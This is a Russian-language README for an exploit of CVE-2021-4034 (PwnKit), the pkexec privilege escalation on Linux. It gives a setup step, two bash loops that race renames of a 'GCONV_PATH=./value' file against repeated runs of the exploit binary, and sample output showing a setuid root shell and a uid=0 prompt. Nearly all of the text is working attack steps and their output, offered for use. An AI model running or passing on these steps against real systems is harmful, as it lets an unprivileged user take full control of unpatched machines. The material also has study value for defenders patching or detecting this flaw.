
Эксплойт для CVE-2021-4034 (PwnKit), использующий состояние гонки в pkexec для повышения привилегий до root в Linux-системах.
Эксплойт для уязвимости pwnkit от команды Qualys.
Этот эксплойт предполагает, что на целевой машине установлен gcc.
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
Выполните следующую команду в одном bash-сеансе:
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
Выполните следующую команду в другом bash-сеансе:
while :; do ./exploit; done
В конечном итоге вы выиграете гонку и получите бинарный файл shell, который даст вам
root-доступ:
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
Краткое описание техники можно найти в моём блоге.